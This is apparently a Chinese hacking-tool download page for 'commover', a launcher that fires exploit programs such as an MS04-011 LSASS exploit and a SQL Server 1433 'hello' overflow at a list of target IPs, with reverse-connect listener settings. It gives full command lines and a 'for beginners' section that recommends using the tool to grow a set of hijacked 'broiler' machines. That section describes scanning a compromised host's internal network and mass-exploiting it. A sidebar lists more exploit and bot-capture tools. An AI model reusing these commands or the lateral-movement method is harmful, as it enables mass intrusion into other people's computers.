|
| 运行环境: Win9x/NT/2000/XP/2003 | |
| 软件语言: 简体中文 | |
| 授权方式: 免费版 | |
| 软件属性: 热 荐 | |
| 解压密码: www.05112.org | |
| 添加时间: 2006-9-26 10:39:05 | |
| 下载次数:总计: |
| ::软件简介:: |  |
用法:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
Usage: commover [head] file after exp
head------EXP的前缀参数(多个参数需要用双引号刮起来)
file------保存攻击IP的文件的全名(.txt)
after------EXP的后缀参数(多个参数需要用双引号刮起来)
exp------exp的文件全名(.exe)
有前缀参数:comover 0 file.txt "1234 192.168.0.253" ms04011.exe
无前缀参数:comover file.txt "1433 192.168.0.253 1234" sqlhello.exe
具体的例子:(有前缀参数的)
比如利用MS04-011.exe,存在漏洞的主机IP存在lsass.txt中,利用返回模式进行攻击
监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:ms04011.exe
那么具体参数就是这样:comover 0(1) lsass.txt "1234 192.168.0.253" ms04011.exe
具体的例子:(无前缀参数的)
比如利用SQL 1433端口的hello溢出sqlhello.exe,存在漏洞的主机IP存在1433.txt中,
监听端口:1234 我本地的监听IP:192.168.0.253 具体的EXP攻击程序:sqlhello.exe
那么具体参数就是这样:comover 1433.txt "1433 192.168.0.253 1234" sqlhello.exe
大致用法就是这样,对不同的exp程序应该根据具体的EXP用法使用;
不过特别要主义的是,当前缀或者后缀参数有多个参数的时候一定要用双用好包括起来;
file.txt里面一行只能保存一个IP。
写给菜鸟:
这个东西我认为用来扩大自己的肉鸡是非常有用的,比如我通过SQL的hello溢出得到
192.168.111.23的一台肉鸡,那么我们就可以通过其他的漏洞
比如MS04011,我们可以先利用rootshell写的那个scanner对其内网进行扫描,得到结
果lsass.txt
下载下来编辑去掉后面无用的信息,在传上去,然后把MS04011.EXE 传到肉鸡上面,
在利用这个commover.exe进行攻击,相信你会得到很意外的收获,哈哈!
| 自动扫描溢出 1.0 | 01-12 |
| 局域网渗透工具 | 01-07 |
| 综合利用端口溢出抓鸡 | 01-03 |
| 135自动抓鸡器 | 12-28 |
| servU5.0.0.4溢出工具 | 09-04 |
| winrar3.5溢出利用工具 | 11-11 |
| 溢出工具集合 | 11-04 |
| Word溢出漏洞利用工具 | 11-02 |
| 最新IMail溢出程序 | 10-26 |
| Microsoft Office 2003 PPT 本地 | 10-18 |
| 动网7.0爆库工具 | 10-13 |
| 飞刀idq溢出攻击 | 10-12 |
| 自动扫描溢出 1.0 | 01-12 |
| 局域网渗透工具 | 01-07 |
| 综合利用端口溢出抓鸡 | 01-03 |
| 135自动抓鸡器 | 12-28 |
| servU5.0.0.4溢出工具 | 09-04 |
| winrar3.5溢出利用工具 | 11-11 |
| 溢出工具集合 | 11-04 |
| Word溢出漏洞利用工具 | 11-02 |
| 最新IMail溢出程序 | 10-26 |
| Microsoft Office 2003 PPT 本地 | 10-18 |
您现在的位置: